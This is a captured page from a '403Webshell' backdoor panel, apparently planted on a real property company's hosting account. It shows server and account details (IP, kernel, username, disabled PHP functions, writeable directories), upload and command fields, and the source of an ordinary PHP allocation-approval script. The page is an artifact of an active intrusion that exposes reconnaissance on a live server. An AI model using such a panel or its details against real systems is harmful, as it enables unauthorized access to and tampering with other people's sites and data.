403Webshell
Server IP : 72.60.21.38  /  Your IP : 216.73.217.140
Web Server : LiteSpeed
System : Linux uk-fast-web1372.main-hosting.eu 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
User : u390967363 ( 390967363)
PHP Version : 8.2.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u390967363/domains/aibenproperties.com/public_html/app/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/u390967363/domains/aibenproperties.com/public_html/app/exec-approve-allocation.php
<?php
if (session_status() === PHP_SESSION_NONE) { session_start(); }
require_once __DIR__ . '/includes/db.php';
require_once __DIR__ . '/includes/functions.php';

$role = $_SESSION['user_role'] ?? '';
if (!in_array($role, ['chairman_ceo', 'super_admin'])) {
    header("Location: dashboard.php");
    exit;
}

$action = $_GET['action'] ?? '';
$id = isset($_GET['id']) ? (int)$_GET['id'] : 0;
if ($id <= 0 || !in_array($action, ['approve','reject'])) {
    header("Location: executive-dashboard.php?notice=" . urlencode("Invalid request") . "&type=danger");
    exit;
}

function table_has_column(PDO $pdo, string $table, string $col): bool {
    try {
        $stmt = $pdo->prepare("SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = DATABASE() AND TABLE_NAME = ? AND COLUMN_NAME = ?");
        $stmt->execute([$table, $col]);
        return (bool)$stmt->fetchColumn();
    } catch (Exception $e) {
        return false;
    }
}

try {
    $pdo->beginTransaction();
    $newStatus = $action === 'approve' ? 'approved' : 'rejected';
    $sql = "UPDATE allocations SET status = ?, updated_at = CURRENT_TIMESTAMP";
    $params = [$newStatus];

    $hasApprovedBy = table_has_column($pdo, 'allocations', 'approved_by');
    $hasApprovedAt = table_has_column($pdo, 'allocations', 'approved_at');
    if ($newStatus === 'approved') {
        if ($hasApprovedBy) { $sql .= ", approved_by = ?"; $params[] = $_SESSION['user_id'] ?? null; }
        if ($hasApprovedAt) { $sql .= ", approved_at = CURRENT_TIMESTAMP"; }
    }
    $sql .= " WHERE id = ?";
    $params[] = $id;
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);

    // Optional: basic activity log if table exists
    $hasLog = false;
    try {
        $hasLog = table_has_column($pdo, 'activity_logs', 'entity_type')
              && table_has_column($pdo, 'activity_logs', 'entity_id')
              && table_has_column($pdo, 'activity_logs', 'action');
    } catch (Exception $e) {}
    if ($hasLog) {
        $stmt = $pdo->prepare("INSERT INTO activity_logs (entity_type, entity_id, action, user_id, created_at) VALUES ('allocation', ?, ?, ?, CURRENT_TIMESTAMP)");
        $stmt->execute([$id, $newStatus, $_SESSION['user_id'] ?? null]);
    }

    $pdo->commit();
    $msg = $action === 'approve' ? 'Allocation approved' : 'Allocation rejected';
    header("Location: executive-dashboard.php?notice=" . urlencode($msg) . "&type=success");
    exit;
} catch (Exception $e) {
    if ($pdo->inTransaction()) { $pdo->rollBack(); }
    header("Location: executive-dashboard.php?notice=" . urlencode('Action failed') . "&type=danger");
    exit;
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit